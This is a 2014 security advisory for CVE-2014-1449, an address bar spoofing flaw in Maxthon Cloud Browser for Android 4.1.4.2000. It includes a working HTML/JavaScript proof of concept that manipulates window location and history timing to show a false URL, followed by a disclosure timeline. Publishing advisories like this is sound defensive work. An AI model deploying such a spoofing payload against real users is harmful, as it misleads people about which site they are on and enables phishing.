# Vulnerability: Maxthon Cloud Browser for Android Address Bar Spoofing
# Date: 10.01.2014
# Software Link: https://play.google.com/store/apps/details?id=com.mx.browser
# Vulnerable version: 4.1.4.2000
# Tested on: Android 4.4
# CVE: CVE-2014-1449
# Author: Pawel Wylecial
# http://h0wl.pl
1. Background
Description from the vendor website: "Maxthon Cloud Browser for Android is the first multi-tab browser with Maxthon’s innovative Cloud Services, including: Cloud Tabs, Cloud Push, Cloud Download and bookmarks/favorites syncing. With its cool design and out of the box features like Super Gestures, Reader Mode, App Center and more, this browser delivers a fresh and original browsing experience."
2. Vulnerability
Maxthon for Android is vulnerable to Address Bar Spoofing. Using the history API it was possible to spoof the URL in the address bar which could trick the user that he is visiting a different site than he thinks.
3. Proof of Concept
<html>
<script>
function trigger() {
w = window.open("http://howl.overflow.pl");
w.location = "http://h0wl.pl";
setTimeout('w.location = "a.html"', 1000);
setTimeout('w.history.back();', 2000);
setTimeout('w.history.forward();', 2100);
}
</script>
<a href="javascript:trigger();">click</a>
</html>
PoC in action: http://howl.overflow.pl/maxthon1.mp4
4. Fix
No response from the vendor, silent fix applied in 4.1.5.2000 (can't confirm here, updated straight to 4.1.6.2000) or 4.1.6.2000
5. Timeline
10.01.2014 - vulnerability reported
15.01.2014 - second e-mail
21.01.2014 - third
22.01.2014 - *silent fix applied (?), http://www.maxthon.com/android/changelog/
29.01.2014 - last try
10.03.2014 - advisory published
